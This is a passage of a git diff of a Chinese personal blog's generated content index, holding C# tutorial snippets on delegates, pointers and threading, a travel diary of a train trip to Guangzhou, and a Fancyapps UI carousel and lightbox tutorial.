    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    using System;

    delegate void NumberChanger(int n);

    namespace DelegateAppl
    {
    class TestDelegate
    {
    static int num = 10;

    public static void AddNum(int p)
    {
    num += p;
    Console.WriteLine("Named Method: {0}", num);
    }

    public static void MultNum(int q)
    {
    num *= q;
    Console.WriteLine("Named Method: {0}", num);
    }

    static void Main(string[] args)
    {
    // 使用 lambda 表达式创建委托实例
    NumberChanger nc = x => Console.WriteLine($"Lambda Expression: {x}");

    // 使用 lambda 表达式调用委托
    nc(10);

    // 使用命名方法实例化委托
    nc = new NumberChanger(AddNum);

    // 使用命名方法调用委托
    nc(5);

    // 使用另一个命名方法实例化委托
    nc = new NumberChanger(MultNum);

    // 使用命名方法调用委托
    nc(2);

    Console.ReadKey();
    }
    }
    }
    1
    2
    3
    Lambda Expression: 10
    Named Method: 15
    Named Method: 30

    C# 不安全代码

    ​当一个代码块使用 unsafe 修饰符标记时,C# 允许在函数中使用指针变量。不安全代码或非托管代码是指使用了指针变量的代码块。

    ​就跟 C/C++ 差不多了……

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    using System;
    namespace UnsafeCodeApplication
    {
    class Program
    {
    static unsafe void Main(string[] args)
    {
    int var = 20;
    int* p = &var;
    Console.WriteLine("Data is: {0} ", var);
    Console.WriteLine("Address is: {0}", (int)p);
    Console.ReadKey();
    }
    }
    }

    C# 多线程

    线程 被定义为程序的执行路径。每个线程都定义了一个独特的控制流。如果您的应用程序涉及到复杂的和耗时的操作,那么设置不同的线程执行路径往往是有益的,每个线程执行特定的工作。

    ​线程是轻量级进程。一个使用线程的常见实例是现代操作系统中并行编程的实现。使用线程节省了 CPU 周期的浪费,同时提高了应用程序的效率。

    ​到目前为止我们编写的程序是一个单线程作为应用程序的运行实例的单一的过程运行的。但是,这样子应用程序同时只能执行一个任务。为了同时执行多个任务,它可以被划分为更小的线程。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    using System;
    using System.Threading;

    namespace MultithreadingApplication
    {
    class ThreadCreationProgram
    {
    public static void CallToChildThread()
    {
    try
    {

    Console.WriteLine("Child thread starts");
    // 计数到 10
    for (int counter = 0; counter <= 10; counter++)
    {
    Thread.Sleep(500);
    Console.WriteLine(counter);
    }
    Console.WriteLine("Child Thread Completed");

    }
    catch (ThreadAbortException e)
    {
    Console.WriteLine("Thread Abort Exception");
    }
    finally
    {
    Console.WriteLine("Couldn't catch the Thread Exception");
    }

    }

    static void Main(string[] args)
    {
    ThreadStart childref = new ThreadStart(CallToChildThread);
    Console.WriteLine("In Main: Creating the Child thread");
    Thread childThread = new Thread(childref);
    childThread.Start();
    // 停止主线程一段时间
    Thread.Sleep(2000);
    // 现在中止子线程
    Console.WriteLine("In Main: Aborting the Child thread");
    childThread.Abort(); // 终止子线程
    Console.ReadKey();
    }
    }
    }
    1
    2
    3
    4
    5
    6
    7
    8
    In Main: Creating the Child thread
    Child thread starts
    0
    1
    2
    In Main: Aborting the Child thread
    Thread Abort Exception
    Couldn't catch the Thread Exception
    ]]>
    @@ -1228,7 +1228,7 @@ /posts/Diary-%E7%B2%A4%E4%BA%86%EF%BC%88%E4%B8%80%EF%BC%89/ - .G{ margin: 5px auto; width: 100%; aspect-ratio: 0.684; position: relative; background: url('1-去程/G335.webp'); background-size: cover; overflow: hidden; }

    前言

            

    ​这是一个姗姗来迟的系列……我想把这个系列做得好看一点,所以有时间慢慢整吧。

    ​7.11 放暑假回家了,按照之前的计划,先去广东玩三天再回去😍。

    正文

    1-去程

    06:44 再见冀大!

    七一路河大新区

    ​虽然说是 8:09 的高铁,但是我已经等不及了😍。

    06:47 巨力大桥

    遥远的鸽子啊

    ​再见!可爱小雾霾😭!

    06:58 准备上车

    候车室

    ​还有 1 个小时,我下象棋,我一阵乱输,好像没太睡醒😅。

    08:09 G335

    ​车票:G335 08:09 保定东-17:49 广州南。12306 系统好像更新了,不让拆开买学生票了😅,只得全票¥823。这个价格比坐飞机要来的贵,但我觉得从冀大到飞机场挺麻烦的,所以还是就坐这个高铁好了。

    ​啊!京广高铁,贯穿南北,一路向南,9 小时 40 分钟。车上就看提前缓存好的 安州牧《风云南北朝》-哔哩哔哩视频 (bilibili.com),来了解一下之前历史课上几乎没怎么学到的南北朝历史好了。

    ​整个路上大概看了一半,看上去没几个正经君主😅。怪不得历史课都不怎么教,这段历史不助于学生培养正确的唯物史观😅。

    石家庄
    郑州
    长江
    武汉
    长沙南
    湘江
    衡阳东
    铜钱楼
    广州塔

    看来,河南雾霾也挺严重的……

    到了湖北就开始各种山。

    完全没有雾霾了😍!

    进韶关后,山多得跟福建一样😅。

    凡哥我来了😍
    我现在应该离小迷糊挺远的
    阳哥我来了😍

    征南!

    ​一次网页排版的尝试,图 p 了老半天,最后还是感觉不太好,手机上看挤一块了😭。

    ​注:此时背景画的是公元 451 年拓跋焘饮马长江后率军北归后的北魏-刘宋地图,用钢笔工具粗略绘制,仅供参考,难免出现侵犯大魏/大宋疆土的情形🥴。不太确定这个时候的漯河属于北魏还是刘宋。

    17:34 广州塔

    广州塔

    ​最后一批崇山峻岭后,来到了珠三角平原!终于进广州了!

    ​窗外已经可以看到传说中的广州塔😍。

    广州塔

    ​广州塔(英语:Canton Tower)又称广州新电视塔,昵称小蛮腰,其位于中国广东省广州市海珠区(艺洲岛)赤岗塔附近,距离珠江南岸 125 米,与珠江新城、花城广场、海心沙岛隔江相望。广州塔塔身主体高 454 米,天线桅杆高 146 米,总高度 600 米。是中国第一高塔,是国家 AAAA 级旅游景区。

    17:39 铜钱楼

    铜钱楼

    ​窗外已经可以看到传说中的铜钱楼😍。

    广州圆大厦

    ​广州圆大厦位于广东省广州市荔湾区白鹅潭经济圈最南端,是由意大利人约瑟夫设计的一座近似圆形建筑物。大楼将建成 138 米高、外圆直径 146.6 米、内圆直径 47 米的 33 层建筑。
    ​“大楼形状像‘水轮车’,且与珠江水里的倒影形成‘8’字,寓意塑料交易风生水起。2013 年 9 月 24 日,广州“铜钱大楼”经过 10 万元征名,已正式命名为“广州圆大厦”。2013 年 12 月 16 日,广州珠江边的土豪金“圆大厦”正式落成。

    ​广州南站修在了离广州市区非常远的地方……估计是跟福州南站一样,为了发展所谓的新区。

    17:45 广州南站

    下车!

    ​OK,下车。好久没有看见这么蓝的天了😭。

    据说这也号称是亚洲第一大高铁站

    ​去民宿,广州南站-2 号线-公园前站-1 号线-广州东站,¥6。

    ​广州南站之远,以至于去天河区还得再倒腾一个小时的地铁😭。

    ​广州地铁挤得跟北京有得一比了,这就是一线城市🤧!而且这个地铁花样还挺多,走一半还会换个车门开。

    ​感觉广州把本地方言保护得很好,说粤语的人蛮多。

    18:46 终于挤完了地铁!

    看上去物价不高

    ​从地铁站下来看到这个价格让我一度震惊,广州居然物价这么低的🫨???后来觉得还是高得一比😅,但不知道为什么这家在火车站旁边还这么便宜。

    19:03 林和中路

    感觉有点年代了

    ​这个玻璃房让我想起了……十几年前的福州😅。

    ​走到这里的时候突然特别想上厕所,结果还找不到,最后拎着大包小包找了个麦当劳解决了,旁边的服务员小哥投来了异样的眼神🤧。

    19:17 到达民宿!

    法兰西巴洛克样式

    ​走得满身汗,最后到民宿楼下,还是迷路了,不知道怎么上楼🤧。打电话叫民宿阿姨给带上去。

    ​价格¥178+¥188+¥188+¥178-¥32.94-¥73.20=¥625.86!平均一晚上¥156.47。看上去价格还行,装修和卫生也蛮好的,最重要是我看中它离广州东站特别近便于我大早上坐车跑路😬。

    ​结果上来才发现居然是一间套房分成了好多间,各个单间分开租,卫浴是公共的😶,这就是一线城市!选房的时候没看清楚,那好吧就住几个晚上凑合凑合。

    2-珠江

    19:34 馄饨

    ​到民宿简单把包一扔就出发了,第一站——广州塔!

    老广馄饨

    ​出发前一天在保定买好了这天的午饭和晚饭,结果我在高铁上太无聊,没到饭点就把便当吃了,太久没吃东西了还有点饿,决定先吃点夜宵。

    ​本来想去找找有没有肠粉摊,没有找到,找了家馄饨店。这碗馄饨¥18,在保定待久了感觉好贵🤧。

    20:07 上地铁!

    广州地铁线网示意图

    ​看一看广州的地铁交通图,实际情况比这线路更多,可以直接坐地铁去佛山。

    ​你还可以坐地铁去永泰和燕山!但是我选择坐广州东站-1 号线-林和西-APM 线-海心沙,¥2+¥2=¥4。

    ​所谓的 APM 线就是无人驾驶的地铁,中间转车还得走好久。

    20:19 广州塔

    这就是广州塔!

    ​一下车就见到了所谓的广州塔!高 600m,拳打北京中国尊,脚踢天津 117!这是我目前见过的最高的建筑物了🤩。

    20:21 I❤GZ

    自作多情标志

    ​见到了海心沙广场传说中的“I❤GZ”标志🤩,来跟 ZJ 炫耀一番。

    看着就比我爱镇江牛逼😭
    大家都爱 gz😭

    20:30 喷泉表演

    喷泉表演 喷泉表演

    喷泉表演

    ​之前听说 20:30 海心沙广场有喷泉表演!看来我时间把握的不错😎。

    ​然而,我觉得这个喷泉表演没有南昌秋水广场的有造型。

    20:43 人挤人

    人从众𠈌

    ​人实在是太多了!最后还是挤到一个中间位置。结果前面还有个人😅。

    20:45 海心沙岛

    广州塔
    广州塔
    广州塔
    广州塔

    海心沙岛

    ​接下来,按照小红书给的路线,腿去海心桥过江。

    ​这个海心沙岛看上去是之前为 2010 年亚运会而特意建设的。

    20:54 海心桥

    桥上密密麻麻的都是人😭

    ​这个桥只供行人行走。之前还必须预约才能上桥,现在工作日可以直接进,结果人还是多的有点夸张,感觉比天安门的人密度还大🫠。

    珠江
    珠江
    珠江

    珠江

    ​这个珠江看上去也就闽江一般宽度嘛。

    ​最后过江,广州塔站-APM 线-林和西回民宿,¥2。

    21:38 廣州東站

    回民宿開躺!

    ​這個火車站的車牌居然還是繁體字哎!

    ]]>
    + .G{ margin: 5px auto; width: 100%; aspect-ratio: 0.684; position: relative; background: url('1-去程/G335.webp'); background-size: cover; overflow: hidden; }

    前言

            

    ​这是一个姗姗来迟的系列……我想把这个系列做得好看一点,所以有时间慢慢整吧。

    ​7.11 放暑假回家了,按照之前的计划,先去广东玩三天再回去😍。

    正文

    1-去程

    06:44 再见冀大!

    七一路河大新区

    ​虽然说是 8:09 的高铁,但是我已经等不及了😍。

    06:47 巨力大桥

    遥远的鸽子啊

    ​再见!可爱小雾霾😭!

    06:58 准备上车

    候车室

    ​还有 1 个小时,我下象棋,我一阵乱输,好像没太睡醒😅。

    08:09 G335

    ​车票:G335 08:09 保定东-17:49 广州南。12306 系统好像更新了,不让拆开买学生票了😅,只得全票¥823。这个价格比坐飞机要来的贵,但我觉得从冀大到飞机场挺麻烦的,所以还是就坐这个高铁好了。

    ​啊!京广高铁,贯穿南北,一路向南,9 小时 40 分钟。车上就看提前缓存好的 安州牧《风云南北朝》-哔哩哔哩视频 (bilibili.com),来了解一下之前历史课上几乎没怎么学到的南北朝历史好了。

    ​整个路上大概看了一半,看上去没几个正经君主😅。怪不得历史课都不怎么教,这段历史不助于学生培养正确的唯物史观😅。

    石家庄
    郑州
    长江
    武汉
    长沙南
    湘江
    衡阳东
    铜钱楼
    广州塔

    看来,河南雾霾也挺严重的……

    到了湖北就开始各种山。

    完全没有雾霾了😍!

    进韶关后,山多得跟福建一样😅。

    凡哥我来了😍
    我现在应该离小迷糊挺远的
    阳哥我来了😍

    征南!

    ​一次网页排版的尝试,图 p 了老半天,最后还是感觉不太好,手机上看挤一块了😭。

    ​注:此时背景画的是公元 451 年拓跋焘饮马长江后率军北归后的北魏-刘宋地图,用钢笔工具粗略绘制,仅供参考,难免出现侵犯大魏/大宋疆土的情形🥴。不太确定这个时候的漯河属于北魏还是刘宋。

    17:34 广州塔

    广州塔

    ​最后一批崇山峻岭后,来到了珠三角平原!终于进广州了!

    ​窗外已经可以看到传说中的广州塔😍。

    广州塔

    ​广州塔(英语:Canton Tower)又称广州新电视塔,昵称小蛮腰,其位于中国广东省广州市海珠区(艺洲岛)赤岗塔附近,距离珠江南岸 125 米,与珠江新城、花城广场、海心沙岛隔江相望。广州塔塔身主体高 454 米,天线桅杆高 146 米,总高度 600 米。是中国第一高塔,是国家 AAAA 级旅游景区。

    17:39 铜钱楼

    铜钱楼

    ​窗外已经可以看到传说中的铜钱楼😍。

    广州圆大厦

    ​广州圆大厦位于广东省广州市荔湾区白鹅潭经济圈最南端,是由意大利人约瑟夫设计的一座近似圆形建筑物。大楼将建成 138 米高、外圆直径 146.6 米、内圆直径 47 米的 33 层建筑。
    ​“大楼形状像‘水轮车’,且与珠江水里的倒影形成‘8’字,寓意塑料交易风生水起。2013 年 9 月 24 日,广州“铜钱大楼”经过 10 万元征名,已正式命名为“广州圆大厦”。2013 年 12 月 16 日,广州珠江边的土豪金“圆大厦”正式落成。

    ​广州南站修在了离广州市区非常远的地方……估计是跟福州南站一样,为了发展所谓的新区。

    17:45 广州南站

    下车!

    ​OK,下车。好久没有看见这么蓝的天了😭。

    据说这也号称是亚洲第一大高铁站

    ​去民宿,广州南站-2 号线-公园前站-1 号线-广州东站,¥6。

    ​广州南站之远,以至于去天河区还得再倒腾一个小时的地铁😭。

    ​广州地铁挤得跟北京有得一比了,这就是一线城市🤧!而且这个地铁花样还挺多,走一半还会换个车门开。

    ​感觉广州把本地方言保护得很好,说粤语的人蛮多。

    18:46 终于挤完了地铁!

    看上去物价不高

    ​从地铁站下来看到这个价格让我一度震惊,广州居然物价这么低的🫨???后来觉得还是高得一比😅,但不知道为什么这家在火车站旁边还这么便宜。

    19:03 林和中路

    感觉有点年代了

    ​这个玻璃房让我想起了……十几年前的福州😅。

    ​走到这里的时候突然特别想上厕所,结果还找不到,最后拎着大包小包找了个麦当劳解决了,旁边的服务员小哥投来了异样的眼神🤧。

    19:17 到达民宿!

    法兰西巴洛克样式

    ​走得满身汗,最后到民宿楼下,还是迷路了,不知道怎么上楼🤧。打电话叫民宿阿姨给带上去。

    ​价格¥178+¥188+¥188+¥178-¥32.94-¥73.20=¥625.86!平均一晚上¥156.47。看上去价格还行,装修和卫生也蛮好的,最重要是我看中它离广州东站特别近便于我大早上坐车跑路😬。

    ​结果上来才发现居然是一间套房分成了好多间,各个单间分开租,卫浴是公共的😶,这就是一线城市!选房的时候没看清楚,那好吧就住几个晚上凑合凑合。

    2-珠江

    19:34 馄饨

    ​到民宿简单把包一扔就出发了,第一站——广州塔!

    老广馄饨

    ​出发前一天在保定买好了这天的午饭和晚饭,结果我在高铁上太无聊,没到饭点就把便当吃了,太久没吃东西了还有点饿,决定先吃点夜宵。

    ​本来想去找找有没有肠粉摊,没有找到,找了家馄饨店。这碗馄饨¥18,在保定待久了感觉好贵🤧。

    20:07 上地铁!

    广州地铁线网示意图

    ​看一看广州的地铁交通图,实际情况比这线路更多,可以直接坐地铁去佛山。

    ​你还可以坐地铁去永泰和燕山!但是我选择坐广州东站-1 号线-林和西-APM 线-海心沙,¥2+¥2=¥4。

    ​所谓的 APM 线就是无人驾驶的地铁,中间转车还得走好久。

    20:19 广州塔

    这就是广州塔!

    ​一下车就见到了所谓的广州塔!高 600m,拳打北京中国尊,脚踢天津 117!这是我目前见过的最高的建筑物了🤩。

    20:21 I❤GZ

    自作多情标志

    ​见到了海心沙广场传说中的“I❤GZ”标志🤩,来跟 ZJ 炫耀一番。

    看着就比我爱镇江牛逼😭
    大家都爱 gz😭

    20:30 喷泉表演

    喷泉表演 喷泉表演

    喷泉表演

    ​之前听说 20:30 海心沙广场有喷泉表演!看来我时间把握的不错😎。

    ​然而,我觉得这个喷泉表演没有南昌秋水广场的有造型。

    20:43 人挤人

    人从众𠈌

    ​人实在是太多了!最后还是挤到一个中间位置。结果前面还有个人😅。

    20:45 海心沙岛

    广州塔
    广州塔
    广州塔
    广州塔

    海心沙岛

    ​接下来,按照小红书给的路线,腿去海心桥过江。

    ​这个海心沙岛看上去是之前为 2010 年亚运会而特意建设的。

    20:54 海心桥

    桥上密密麻麻的都是人😭

    ​这个桥只供行人行走。之前还必须预约才能上桥,现在工作日可以直接进,结果人还是多的有点夸张,感觉比天安门的人密度还大🫠。

    珠江
    珠江
    珠江

    珠江

    ​这个珠江看上去也就闽江一般宽度嘛。

    ​最后过江,广州塔站-APM 线-林和西回民宿,¥2。

    21:38 廣州東站

    回民宿開躺!

    ​這個火車站的車牌居然還是繁體字哎!

    ]]>
    @@ -1257,7 +1257,7 @@ /posts/Web-fancyapps/ - 资源

    正文

    Fancybox

    引入

    ​从 Releases · fancyapps/ui (github.com) 引入 fancybox.umd.jsfancybox.css

    <script src="fancybox.umd.js"></script>
    <link rel="stylesheet" href="fancybox.css" />

    ​请注意,这种方法的缺点是,每次要将文件更新到最新版本时,都必须执行此操作。

    ​因此,推荐的方法是使用 NPM 等包管理器或使用 CDN 链接,这些链接将自动使用最新的补丁版本而不会影响您的代码。

    使用

    <a href="222.png" data-fancybox="gallery" data-caption="青玉之爪">
    <img alt="青玉之爪" src="222.png" />
    </a>

    <a href="653.png" data-fancybox="gallery" data-caption="艾雅 · 黑掌">
    <img alt="艾雅 · 黑掌" src="653.png" />
    </a>

    ​即在传统 <img> 显示图片上外包一层 <a>

    • <a>href 应与 <img>src 保持一致;
    • <a>data-caption 应与 <img>alt 保持一致。

    ​最后在网页的尾部(或是其它合适位置)注册 fancybox:

    Fancybox.bind(document.getElementById("gallery-wrap"), "[data-fancybox]", {
    // Your custom options
    });

    ​可以从 Options | Fancybox - best JavaScript lightbox alternative (fancyapps.com) 获取想要修改的设置 API。

    ​控制 fancybox 的函数:Methods | Fancybox - best JavaScript lightbox alternative (fancyapps.com)

    ​一些执行后的派发事件:Events | Fancybox - best JavaScript lightbox alternative (fancyapps.com)

    ​一般来说,没啥好设置的……

    效果

    青玉之爪 艾雅 · 黑掌

    引入

    <script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/carousel/carousel.umd.js"></script>
    <link
    rel="stylesheet"
    href="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/carousel/carousel.css"
    />

    使用

    ​从 Parallax Slider - StackBlitz 抄一个牛逼的!

    ​创建一个轮播对象 #myCarousel

    <div class="f-carousel" id="myCarousel" style="background: #ff000020;">
    <div class="f-carousel__slide"><img alt="图腾魔像" src="234.png" /><center>当你把一堆图腾绑在一起时,图腾魔像就诞生了。</center></div>
    <div class="f-carousel__slide"><img alt="阴燃电鳗" src="223.png" /><center>用来做鳗鱼饭最合适不过了!</center></div>
    <div class="f-carousel__slide"><img alt="投火无面者" src="477.png" /><center>他的手感热得发烫,百步穿杨技惊四座!</center></div>
    <div class="f-carousel__slide"><img alt="艾雅 · 黑掌" src="653.png" /><center>别看艾雅年纪轻,她可是玉莲帮的实际掌权者。看似天真活泼的少女,转眼之间便能召唤出魔像大军,将敌人统统碾碎!</center></div>
    <div class="f-carousel__slide"><img alt="深渊魔物" src="655.png" /><center>深渊魔物有一奇怪的癖好,就是收集各式各样的萨满祭司图腾。</center></div>
    <div class="f-carousel__slide"><img alt="吉恩 · 格雷迈恩" src="665.png" /><center>“希尔瓦娜斯杀了偶的儿子,偶一定要为他报仇!”</center></div>
    <div class="f-carousel__slide"><img alt="海巨人" src="1088.png" /><center>嗨,巨人!</center></div>
    </div>

    <div class="f-carousel__slide"> 中可以不只是 <img>


    ​设置好 #myCarousel 的样式 :

    .f-carousel__dots>li:before{
    display: none;
    }

    span.f-carousel__dot {
    color: var(--text-primary);
    transition: color 0.5s ease-in-out;
    }

    #myCarousel {
    --f-carousel-slide-width: calc((100% - 60px) / 4);
    --f-carousel-spacing: 20px;

    --f-button-next-pos: 1rem;
    --f-button-prev-pos: 1rem;

    --f-button-width: 44px;
    --f-button-height: 44px;
    --f-button-border-radius: 50%;

    --f-button-color: #fff;
    --f-button-hover-color: #fff;
    --f-button-active-color: #fff;

    --f-button-bg: rgba(0, 0, 0, 0.5);
    --f-button-hover-bg: rgba(0, 0, 0, 0.8);
    --f-button-active-bg: rgba(0, 0, 0, 0.8);

    --f-button-svg-width: 22px;
    --f-button-svg-height: 22px;
    --f-button-svg-stroke-width: 3;
    }
    • --f-carousel-slide-width: calc((100% - 60px) / 4); 可以让一个页面显示中间 3 个页,左右两边显示 2 个半页。

    ​其它的都是设置 UI 样式了。


    ​注册对象:

    const mapRange = (inputLower, inputUpper, outputLower, outputUpper, value) => {
    const INPUT_RANGE = inputUpper - inputLower;
    const OUTPUT_RANGE = outputUpper - outputLower;
    return (
    outputLower + (((value - inputLower) / INPUT_RANGE) * OUTPUT_RANGE || 0)
    );
    };

    new Carousel(document.getElementById('myCarousel'), {
    slidesPerPage: 1,
    dragFree: true,

    Dots: false,
    Panzoom: {
    decelFriction: 0.08,
    },

    on: {
    'Panzoom.beforeTransform': (carousel) => {
    carousel.slides.map((slide) => {
    const progress = carousel.getProgress(slide.index, true);

    const progress1 = mapRange(-4, 4, 50, -50, progress);
    slide.el.style.setProperty('--f-progress1', `${progress1}%`);

    const progress2 = mapRange(-4, 4, 50, -50, 1 - progress);
    slide.el.style.setProperty('--f-progress2', `${progress2}%`);
    });
    },
    },
    });

    ​这段代码可以让每次翻页只翻一个页面宽度。


    ​可以从 Options | Carousel from Fancyapps UI 获取想要修改的设置 API。

    ​控制 carousel 的函数:Methods | Carousel from Fancyapps UI

    ​一些执行后的派发事件:Events | Carousel from Fancyapps UI

    效果

    ​目前看来,这好像跟懒加载 Troy-Yang/hexo-lazyload-image: lazyload image plugin for Hexo. (github.com) 会有点冲突……或许可以在使用 carousel 的时候把懒加载关了。

    ​我说婷婷!这个插件貌似自带懒加载功能,将 src 属性改为 data-lazy-src 属性即可。

    Panzoom

    ​感觉像是非全屏的 fancybox。

    引入

    <script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/panzoom/panzoom.umd.js"></script>
    <link
    rel="stylesheet"
    href="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/panzoom/panzoom.css"
    />

    使用

    ​创建对象:

    <div class="f-panzoom" id="myPanzoom" style="background: #ff000020;">
    <img class="f-panzoom__content" src="665.png" alt="吉恩 · 格雷迈恩"/>
    </div>

    ​设置 CSS,如果 panzoom 里的元素实际大小大于所设定的大小,则会在渲染的时候自适应大小,而在鼠标移过去时缩放到原大小。

    #myPanzoom {
    height: 300px;
    }

    ​注册对象:

    const container = document.getElementById("myPanzoom");
    const instance = new Panzoom(container, {
    panMode: 'mousemove',
    mouseMoveFactor: 1.25,
    click: false,
    wheel: false
    });

    container.addEventListener("mouseenter", (event) => {
    if (!event.buttons) {
    instance.zoomToCover(event);
    }
    });

    container.addEventListener("mouseleave", () => {
    instance.zoomToFit();
    });

    演示

    吉恩 · 格雷迈恩

    Panzoom-Toolbar

    引入

    ​从 @fancyapps/ui CDN by jsDelivr - A free, fast, and reliable Open Source CDN 获取 panzoom.toolbar.esm.jspanzoom.toolbar.css 并引入。

    使用

    <div class="f-panzoom" id="myPanzoomToolbar" style="background: #ff000020;">
    <img class="f-panzoom__content" src="1088.png" alt="海巨人"/>
    </div>

    <script>
    const options = {
    Toolbar: {
    display: ["zoomIn", "zoomOut", "toggle1to1", "toggleZoom", "panLeft", "panRight", "panUp", "panDown", "rotateCCW", "rotateCW", "flipX", "flipY", "fitX", "fitY", "reset", "toggleFS"],
    },
    };
    new Panzoom(document.getElementById("myPanzoomToolbar"), options, { Toolbar });
    </script>

    ​可以在 Toolbar 下的 display 中设置想要显示的工具栏按钮。

    演示

    海巨人

    Panzoom-Pins

    引入

    ​从 @fancyapps/ui CDN by jsDelivr - A free, fast, and reliable Open Source CDN 获取 panzoom.pins.esm.jspanzoom.pins.css 并引入。

    使用

    <div class="f-panzoom" id="myPanzoomPins">
    <div class="f-panzoom__viewport">
    <div data-panzoom-pin data-x="48.8%" data-y="16.02%">
    <div title="You Are Here">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 0a7.2 7.2 0 0 0-7.27 7.14C4.73 11.08 12 24 12 24s7.27-12.92 7.27-16.86A7.2 7.2 0 0 0 12 0Z"></path></svg>
    </div>
    </div>
    <img class="f-panzoom__content" src="477.png" alt="投火无面者" />
    </div>
    </div>

    <script>
    new Panzoom(document.getElementById("myPanzoomPins"), {
    // Custom options
    }, {
    Pins
    });
    </script>

    ​从 data-panzoom-pin 给图片上打一个 svg,感觉作用不大……

    data-x="48.8%" data-y="16.02%" 通过测量得到,案例中将坐标点打在投火无面者的火焰上。

    演示

    投火无面者

    移植一个牛逼的

    <div class="f-carousel" id="parcelSandbox">
    <div class="f-carousel__slide"><img no-lazy alt="图腾魔像" data-lazy-src="234.png" /></div>
    <div class="f-carousel__slide"><img no-lazy alt="阴燃电鳗" data-lazy-src="223.png" /></div>
    <div class="f-carousel__slide"><img no-lazy alt="投火无面者" data-lazy-src="477.png" /></div>
    <div class="f-carousel__slide"><img no-lazy alt="艾雅 · 黑掌" data-lazy-src="653.png" /></div>
    <div class="f-carousel__slide"><img no-lazy alt="深渊魔物" data-lazy-src="655.png" /></div>
    <div class="f-carousel__slide"><img no-lazy alt="吉恩 · 格雷迈恩" data-lazy-src="665.png" /></div>
    <div class="f-carousel__slide"><img no-lazy alt="海巨人" data-lazy-src="1088.png" /></div>
    </div>

    <style>
    #parcelSandbox {
    height: 450px;
    }
    #parcelSandbox .f-carousel__slide {
    display: flex;
    justify-content: center;
    align-items: center;
    width: clamp(100px, 30vw, 200px);
    height: clamp(100px, 40vw, 300px);
    }
    #parcelSandbox img {
    --x: calc(var(--progress) * 100%);
    --y: calc((var(--progress) + 0.15) * 200%);
    --rot: calc(var(--progress) * 60deg);
    object-fit: cover;
    transform: translate(var(--x), var(--y)) rotate(var(--rot));
    transform-origin: 0% 100%;
    filter: drop-shadow(10px 10px 10px #888);
    }
    </style>

    <script>
    const mapRange = (inputLower, inputUpper, outputLower, outputUpper, value) => {
    const INPUT_RANGE = inputUpper - inputLower;
    const OUTPUT_RANGE = outputUpper - outputLower;
    return (
    outputLower + (((value - inputLower) / INPUT_RANGE) * OUTPUT_RANGE || 0)
    );
    };
    new Carousel(document.getElementById('parcelSandbox'), {
    Dots: false,
    slidesPerPage: 1,
    friction: 0.08,
    on: {
    'refresh Panzoom.beforeTransform': (carousel) => {
    carousel.slides.map((slide) => {
    let slide_progress = carousel.getProgress(slide.index, true);
    slide_progress = mapRange(-1, 1, 1 / 6, -(1 / 6), slide_progress);
    slide.el.style.setProperty('--progress', `${slide_progress}`);
    });
    },
    },
    });
    </script>
    ]]>
    + 资源

    正文

    Fancybox

    引入

    ​从 Releases · fancyapps/ui (github.com) 引入 fancybox.umd.jsfancybox.css

    1
    2
    <script src="fancybox.umd.js"></script>
    <link rel="stylesheet" href="fancybox.css" />

    ​请注意,这种方法的缺点是,每次要将文件更新到最新版本时,都必须执行此操作。

    ​因此,推荐的方法是使用 NPM 等包管理器或使用 CDN 链接,这些链接将自动使用最新的补丁版本而不会影响您的代码。

    使用

    1
    2
    3
    4
    5
    6
    7
    <a href="222.png" data-fancybox="gallery" data-caption="青玉之爪">
    <img alt="青玉之爪" src="222.png" />
    </a>

    <a href="653.png" data-fancybox="gallery" data-caption="艾雅 · 黑掌">
    <img alt="艾雅 · 黑掌" src="653.png" />
    </a>

    ​即在传统 <img> 显示图片上外包一层 <a>

    • <a>href 应与 <img>src 保持一致;
    • <a>data-caption 应与 <img>alt 保持一致。

    ​最后在网页的尾部(或是其它合适位置)注册 fancybox:

    1
    2
    3
    Fancybox.bind(document.getElementById("gallery-wrap"), "[data-fancybox]", {
    // Your custom options
    });

    ​可以从 Options | Fancybox - best JavaScript lightbox alternative (fancyapps.com) 获取想要修改的设置 API。

    ​控制 fancybox 的函数:Methods | Fancybox - best JavaScript lightbox alternative (fancyapps.com)

    ​一些执行后的派发事件:Events | Fancybox - best JavaScript lightbox alternative (fancyapps.com)

    ​一般来说,没啥好设置的……

    效果

    青玉之爪 艾雅 · 黑掌

    引入

    1
    2
    3
    4
    5
    <script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/carousel/carousel.umd.js"></script>
    <link
    rel="stylesheet"
    href="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/carousel/carousel.css"
    />

    使用

    ​从 Parallax Slider - StackBlitz 抄一个牛逼的!

    ​创建一个轮播对象 #myCarousel

    1
    2
    3
    4
    5
    6
    7
    8
    9
    <div class="f-carousel" id="myCarousel" style="background: #ff000020;">
    <div class="f-carousel__slide"><img alt="图腾魔像" src="234.png" /><center>当你把一堆图腾绑在一起时,图腾魔像就诞生了。</center></div>
    <div class="f-carousel__slide"><img alt="阴燃电鳗" src="223.png" /><center>用来做鳗鱼饭最合适不过了!</center></div>
    <div class="f-carousel__slide"><img alt="投火无面者" src="477.png" /><center>他的手感热得发烫,百步穿杨技惊四座!</center></div>
    <div class="f-carousel__slide"><img alt="艾雅 · 黑掌" src="653.png" /><center>别看艾雅年纪轻,她可是玉莲帮的实际掌权者。看似天真活泼的少女,转眼之间便能召唤出魔像大军,将敌人统统碾碎!</center></div>
    <div class="f-carousel__slide"><img alt="深渊魔物" src="655.png" /><center>深渊魔物有一奇怪的癖好,就是收集各式各样的萨满祭司图腾。</center></div>
    <div class="f-carousel__slide"><img alt="吉恩 · 格雷迈恩" src="665.png" /><center>“希尔瓦娜斯杀了偶的儿子,偶一定要为他报仇!”</center></div>
